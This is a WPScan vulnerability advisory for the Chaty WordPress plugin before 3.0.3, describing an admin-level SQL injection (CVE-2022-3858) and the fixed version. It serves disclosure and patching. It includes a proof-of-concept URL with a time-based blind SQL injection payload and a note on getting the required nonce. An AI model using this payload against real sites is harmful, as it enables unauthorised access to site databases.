WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Chaty < 3.0.3 - Admin+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.

Proof of Concept

https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove_chaty_leads=9a03751f9d&action=delete_message&paged=1&search&chaty_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B--+-

To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leads

Affects Plugins

chaty
Fixed in version 3.0.3

References

CVE
CVE-2022-3858

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Duy Quoc Khanh

Submitter

Nguyen Duy Quoc Khanh

Submitter twitter
ndqkhanh
Verified

Yes

WPVDB ID
d251b6c1-602b-4d72-9d6a-bf5d5ec541ec

Timeline

Publicly Published

2022-11-14 (about 6 months ago)

Added

2022-11-14 (about 6 months ago)

Last Updated

2022-11-14 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin